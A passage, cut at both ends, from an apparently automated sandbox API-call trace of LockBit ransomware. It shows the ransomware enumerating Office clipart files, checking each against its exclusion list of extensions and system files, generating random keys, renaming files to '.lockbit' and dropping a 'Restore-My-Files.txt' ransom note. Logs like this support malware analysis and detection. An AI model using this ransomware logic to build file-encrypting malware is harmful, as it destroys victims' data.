office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.278] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x11780, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0384900.JPG", cAlternateFileName="")) returned 1 [0161.278] lstrcmpiW (lpString1=".", lpString2="J0384900.JPG") returned -1 [0161.278] lstrcmpiW (lpString1="..", lpString2="J0384900.JPG") returned -1 [0161.278] PathFindExtensionW (pszPath="J0384900.JPG") returned=".JPG" [0161.278] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.278] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.278] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.279] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.279] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.279] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.279] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.279] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.279] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.279] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.279] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.279] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.279] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.279] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.279] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.280] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.280] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.280] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.280] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.280] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.280] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.280] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.280] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.280] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0384900.JPG") returned 1 [0161.280] lstrcmpiW (lpString1="ntldr", lpString2="J0384900.JPG") returned 1 [0161.280] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0384900.JPG") returned 1 [0161.280] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0384900.JPG") returned -1 [0161.280] lstrcmpiW (lpString1="autorun.inf", lpString2="J0384900.JPG") returned -1 [0161.281] lstrcmpiW (lpString1="thumbs.db", lpString2="J0384900.JPG") returned 1 [0161.281] lstrcmpiW (lpString1="iconcache.db", lpString2="J0384900.JPG") returned -1 [0161.281] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.281] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384900.JPG") returned=".JPG" [0161.281] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.281] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.281] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.281] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.281] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.281] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.281] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.281] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.281] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.281] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.282] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.282] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.282] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.282] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.282] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.282] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.282] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384900.JPG.lockbit") returned 72 [0161.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384900.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384900.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.284] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.284] malloc (_Size=0x40068) returned 0x3df0008 [0161.284] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=71552) returned 1 [0161.284] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.285] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.285] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.290] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384900.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384900.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.291] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.291] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0161.292] free (_Block=0x1fa2ed8) [0161.292] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384900.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.292] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.292] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.292] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x787a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0386120.JPG", cAlternateFileName="")) returned 1 [0161.292] lstrcmpiW (lpString1=".", lpString2="J0386120.JPG") returned -1 [0161.292] lstrcmpiW (lpString1="..", lpString2="J0386120.JPG") returned -1 [0161.292] PathFindExtensionW (pszPath="J0386120.JPG") returned=".JPG" [0161.292] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.292] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.292] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.292] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.292] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.292] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.292] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.292] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.292] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.292] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.292] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.292] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.292] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.293] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.293] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.293] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.293] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.293] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.293] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.293] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.293] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.293] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.293] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.293] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.294] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.294] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.294] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.294] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.294] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.294] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.294] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.294] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0386120.JPG") returned 1 [0161.294] lstrcmpiW (lpString1="ntldr", lpString2="J0386120.JPG") returned 1 [0161.294] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0386120.JPG") returned 1 [0161.294] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0386120.JPG") returned -1 [0161.294] lstrcmpiW (lpString1="autorun.inf", lpString2="J0386120.JPG") returned -1 [0161.294] lstrcmpiW (lpString1="thumbs.db", lpString2="J0386120.JPG") returned 1 [0161.294] lstrcmpiW (lpString1="iconcache.db", lpString2="J0386120.JPG") returned -1 [0161.294] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.294] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386120.JPG") returned=".JPG" [0161.294] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.294] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.294] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.294] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.294] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.294] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.294] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.294] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.295] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.295] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.295] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.295] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.295] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.295] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.295] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.295] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.295] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.295] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386120.JPG.lockbit") returned 72 [0161.295] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386120.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386120.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.297] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.297] malloc (_Size=0x40068) returned 0x3df0008 [0161.297] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=30842) returned 1 [0161.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.298] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.298] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.303] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386120.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386120.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.303] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.303] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.306] free (_Block=0x1fa2ed8) [0161.306] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386120.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.306] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.306] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa91e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0386267.JPG", cAlternateFileName="")) returned 1 [0161.306] lstrcmpiW (lpString1=".", lpString2="J0386267.JPG") returned -1 [0161.306] lstrcmpiW (lpString1="..", lpString2="J0386267.JPG") returned -1 [0161.306] PathFindExtensionW (pszPath="J0386267.JPG") returned=".JPG" [0161.306] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.306] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.306] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.306] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.306] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.306] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.306] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.306] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.306] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.306] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.307] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.307] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.307] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.307] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.307] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.307] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.307] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.307] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.307] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.307] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.307] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.307] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.308] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.308] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.308] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.308] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.308] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.308] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.308] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.308] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.308] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.308] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.308] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0386267.JPG") returned 1 [0161.308] lstrcmpiW (lpString1="ntldr", lpString2="J0386267.JPG") returned 1 [0161.308] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0386267.JPG") returned 1 [0161.308] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0386267.JPG") returned -1 [0161.308] lstrcmpiW (lpString1="autorun.inf", lpString2="J0386267.JPG") returned -1 [0161.308] lstrcmpiW (lpString1="thumbs.db", lpString2="J0386267.JPG") returned 1 [0161.308] lstrcmpiW (lpString1="iconcache.db", lpString2="J0386267.JPG") returned -1 [0161.308] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.308] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386267.JPG") returned=".JPG" [0161.308] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.308] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.308] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.308] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.308] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.309] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.309] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.309] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.309] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.309] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.309] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.309] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.309] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.309] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.309] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.309] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW 